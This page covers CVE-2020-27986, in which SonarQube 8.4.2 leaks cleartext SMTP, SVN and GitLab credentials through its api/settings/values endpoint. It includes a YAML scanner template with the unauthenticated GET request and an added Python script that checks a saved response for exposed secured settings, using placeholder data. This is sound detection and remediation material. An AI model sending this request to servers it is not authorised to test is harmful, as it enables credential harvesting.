SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
PoC code [published]
id: CVE-2020-27986
info:
  name: SonarQube unauth
  author: pa55w0rd
  severity: high
  description: |-
    SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
  reference:
    - https://www.tenable.com/security/research/tra-2020-53
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27986
  tags: cve,cve2020,sonarqube,disclosure
  created: 2023/06/23
rules:
  r0:
    request:
      method: GET
      path: /api/settings/values
    expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"sonaranalyzer-cs.nuget.packageVersion") && response.body.bcontains(b"sonar.core.id")
expression: r0()
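The template above only tells a scanner whether the endpoint answered anonymously; it does not say which settings were exposed. The following is an added example, not part of the template or of SonarQube's own code: it re-implements the r0 match expression in Python so it can be evaluated offline against a saved response, and on a match lists the returned settings whose key carries SonarQube's `.secured` suffix (the convention SonarQube uses for secret-bearing settings, such as SMTP and SVN passwords; treated here as an assumption rather than something the page states). The JSON body below is constructed sample data in the shape `api/settings/values` returns, not a real capture, and every value in it is a placeholder.

```python
"""Offline evaluator for the CVE-2020-27986 detection rule (added example).

Reproduces the template's r0 expression and, on a match, reports which
secret-bearing settings the anonymous response carried, so a defender
reviewing a capture can see the actual exposure rather than a bare hit.
"""
import json

# The two marker keys the template's expression looks for in the body.
MARKER_KEYS = (b"sonaranalyzer-cs.nuget.packageVersion", b"sonar.core.id")

# Suffix SonarQube applies to settings it treats as secrets (assumption).
SECURED_SUFFIX = ".secured"


def rule_r0(status: int, content_type: str, body: bytes) -> bool:
    """Python equivalent of the template's r0 expression:
    200 status, JSON content type, and both marker keys present."""
    return (
        status == 200
        and "application/json" in content_type
        and all(marker in body for marker in MARKER_KEYS)
    )


def secured_keys(body: bytes) -> list:
    """Return the setting keys in an api/settings/values JSON body that end
    in ``.secured``, i.e. the entries an anonymous reader should never see.
    A body that is not valid JSON yields an empty list."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    settings = doc.get("settings", []) if isinstance(doc, dict) else []
    return sorted(
        str(s["key"])
        for s in settings
        if isinstance(s, dict) and str(s.get("key", "")).endswith(SECURED_SUFFIX)
    )


def assess(status: int, content_type: str, body: bytes) -> dict:
    """Combine the rule verdict with the list of exposed secret settings."""
    matched = rule_r0(status, content_type, body)
    return {
        "matched": matched,
        "secured_keys": secured_keys(body) if matched else [],
    }


# Constructed sample response: the shape api/settings/values returns, with
# placeholder values. The two SMTP/SVN keys stand in for exposed credentials.
SAMPLE_BODY = json.dumps({
    "settings": [
        {"key": "sonar.core.id", "value": "PLACEHOLDER-SERVER-ID", "inherited": True},
        {"key": "sonaranalyzer-cs.nuget.packageVersion", "value": "0.0.0", "inherited": True},
        {"key": "email.smtp_username.secured", "value": "placeholder-user", "inherited": False},
        {"key": "email.smtp_password.secured", "value": "placeholder-secret", "inherited": False},
        {"key": "sonar.svn.password.secured", "value": "placeholder-secret", "inherited": False},
    ]
}).encode()


if __name__ == "__main__":
    # Anonymous 200 with JSON: the rule fires and the exposed keys are listed.
    print(assess(200, "application/json; charset=utf-8", SAMPLE_BODY))
    # A 401 (authentication enforced) does not match, regardless of body.
    print(assess(401, "application/json; charset=utf-8", SAMPLE_BODY))
```

Feed `assess()` the status, `Content-Type` header and raw body of a response saved from the instance under review. A non-matching result with a 401 is the expected state once the server requires authentication for API access; a match with a non-empty `secured_keys` list is the finding the CVE describes, and the listed keys tell you which credentials to rotate.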